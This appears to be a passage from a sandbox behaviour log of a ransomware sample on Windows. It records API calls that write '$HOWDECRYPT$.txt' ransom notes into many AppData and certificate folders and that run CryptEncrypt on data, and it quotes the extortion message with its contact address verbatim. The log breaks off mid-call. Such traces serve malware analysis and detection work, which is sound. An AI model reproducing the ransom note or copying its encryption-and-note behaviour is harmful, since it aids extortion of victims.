(lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0143.497] WriteFile (in: hFile=0xac, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ef7c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ef7c*=0x2ac, lpOverlapped=0x0) returned 1 [0143.497] CloseHandle (hObject=0xac) returned 1 [0143.497] GetProcessHeap () returned 0x2c0000 [0143.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33ec38 | out: hHeap=0x2c0000) returned 1 [0143.497] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0143.497] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0143.497] WriteFile (in: hFile=0xac, lpBuffer=0x270ee4f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ef78, lpOverlapped=0x0 | out: lpBuffer=0x270ee4f*, lpNumberOfBytesWritten=0x270ef78*=0x127, lpOverlapped=0x0) returned 1 [0143.498] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0143.498] WriteFile (in: hFile=0xac, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ef78, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ef78*=0x2ac, lpOverlapped=0x0) returned 1 [0143.498] CloseHandle (hObject=0xac) returned 1 [0143.498] GetProcessHeap () returned 0x2c0000 [0143.498] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffc250 | out: hHeap=0x2c0000) returned 1 [0143.499] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0143.499] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0143.499] WriteFile (in: hFile=0xac, lpBuffer=0x270ee4b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ef74, lpOverlapped=0x0 | out: lpBuffer=0x270ee4b*, lpNumberOfBytesWritten=0x270ef74*=0x127, lpOverlapped=0x0) returned 1 [0143.500] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0143.500] WriteFile (in: hFile=0xac, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ef74, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ef74*=0x2ac, lpOverlapped=0x0) returned 1 [0143.500] CloseHandle (hObject=0xac) returned 1 [0143.500] GetProcessHeap () returned 0x2c0000 [0143.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3031028 | out: hHeap=0x2c0000) returned 1 [0143.500] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0143.500] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0143.500] WriteFile (in: hFile=0xac, lpBuffer=0x270ee47*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ef70, lpOverlapped=0x0 | out: lpBuffer=0x270ee47*, lpNumberOfBytesWritten=0x270ef70*=0x127, lpOverlapped=0x0) returned 1 [0143.501] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0143.501] WriteFile (in: hFile=0xac, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ef70, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ef70*=0x2ac, lpOverlapped=0x0) returned 1 [0143.502] CloseHandle (hObject=0xac) returned 1 [0143.502] GetProcessHeap () returned 0x2c0000 [0143.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f65f28 | out: hHeap=0x2c0000) returned 1 [0143.502] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0143.502] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0143.502] WriteFile (in: hFile=0xac, lpBuffer=0x270ee43*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ef6c, lpOverlapped=0x0 | out: lpBuffer=0x270ee43*, lpNumberOfBytesWritten=0x270ef6c*=0x127, lpOverlapped=0x0) returned 1 [0143.503] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0143.503] WriteFile (in: hFile=0xac, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ef6c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ef6c*=0x2ac, lpOverlapped=0x0) returned 1 [0143.503] CloseHandle (hObject=0xac) returned 1 [0143.503] GetProcessHeap () returned 0x2c0000 [0143.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30012a0 | out: hHeap=0x2c0000) returned 1 [0143.503] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my\\ctls\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0143.504] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0143.504] WriteFile (in: hFile=0xac, lpBuffer=0x270ee3f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ef68, lpOverlapped=0x0 | out: lpBuffer=0x270ee3f*, lpNumberOfBytesWritten=0x270ef68*=0x127, lpOverlapped=0x0) returned 1 [0143.505] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0143.505] WriteFile (in: hFile=0xac, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ef68, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ef68*=0x2ac, lpOverlapped=0x0) returned 1 [0143.505] CloseHandle (hObject=0xac) returned 1 [0143.505] GetProcessHeap () returned 0x2c0000 [0143.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f00738 | out: hHeap=0x2c0000) returned 1 [0143.505] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ef08 | out: pbBuffer=0x270ef08) returned 1 [0143.505] GetProcessHeap () returned 0x2c0000 [0143.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0143.505] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ef00*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ef00*=0x30) returned 1 [0143.506] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\.." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0143.506] GetProcessHeap () returned 0x2c0000 [0143.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0143.506] GetProcessHeap () returned 0x2c0000 [0143.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f32878 | out: hHeap=0x2c0000) returned 1 [0143.506] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ef00 | out: pbBuffer=0x270ef00) returned 1 [0143.506] GetProcessHeap () returned 0x2c0000 [0143.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0143.506] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270eef8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270eef8*=0x30) returned 1 [0143.506] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my\\ctls\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0143.506] GetProcessHeap () returned 0x2c0000 [0143.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0143.506] GetProcessHeap () returned 0x2c0000 [0143.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff81c8 | out: hHeap=0x2c0000) returned 1 [0143.506] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my\\crls\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0143.507] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0143.507] WriteFile (in: hFile=0xac, lpBuffer=0x270ee33*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ef5c, lpOverlapped=0x0 | out: lpBuffer=0x270ee33*, lpNumberOfBytesWritten=0x270ef5c*=0x127, lpOverlapped=0x0) returned 1 [0143.507] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0143.507] WriteFile (in: hFile=0xac, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ef5c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ef5c*=0x2ac, lpOverlapped=0x0) returned 1 [0143.508] CloseHandle (hObject=0xac) returned 1 [0143.508] GetProcessHeap () returned 0x2c0000 [0143.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f00638 | out: hHeap=0x2c0000) returned 1 [0143.508] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eef8 | out: pbBuffer=0x270eef8) returned 1 [0143.508] GetProcessHeap () returned 0x2c0000 [0143.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0143.508] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270eef0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270eef0*=0x30) returned 1 [0143.508] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\.." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0143.508] GetProcessHeap () returned 0x2c0000 [0143.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0143.508] GetProcessHeap () returned 0x2c0000 [0143.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f32790 | out: hHeap=0x2c0000) returned 1 [0143.508] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eef8 | out: pbBuffer=0x270eef8) returned 1 [0143.508] GetProcessHeap () returned 0x2c0000 [0143.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0143.508] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270eef0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270eef0*=0x30) returned 1 [0143.508] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my\\crls\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0143.509] GetProcessHeap () returned 0x2c0000 [0143.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0143.509] GetProcessHeap () returned 0x2c0000 [0143.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff80e8 | out: hHeap=0x2c0000) returned 1 [0143.509] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my\\certificates\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0143.509] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0143.509] WriteFile (in: hFile=0xac, lpBuffer=0x270ee27*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ef50, lpOverlapped=0x0 | out: lpBuffer=0x270ee27*, lpNumberOfBytesWritten=0x270ef50*=0x127, lpOverlapped=0x0) returned 1 [0143.510] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0143.510] WriteFile (in: hFile=0xac, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ef50, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ef50*=0x2ac, lpOverlapped=0x0) returned 1 [0143.510] CloseHandle (hObject=0xac) returned 1 [0143.510] GetProcessHeap () returned 0x2c0000 [0143.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f69eb0 | out: hHeap=0x2c0000) returned 1 [0143.510] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eef0 | out: pbBuffer=0x270eef0) returned 1 [0143.510] GetProcessHeap () returned 0x2c0000 [0143.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0143.510] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270eee8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270eee8*=0x30) returned 1 [0143.510] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\.." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0143.510] GetProcessHeap () returned 0x2c0000 [0143.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0143.511] GetProcessHeap () returned 0x2c0000 [0143.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30008f0 | out: hHeap=0x2c0000) returned 1 [0143.511] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eee8 | out: pbBuffer=0x270eee8) returned 1 [0143.511] GetProcessHeap () returned 0x2c0000 [0143.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0143.511] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, 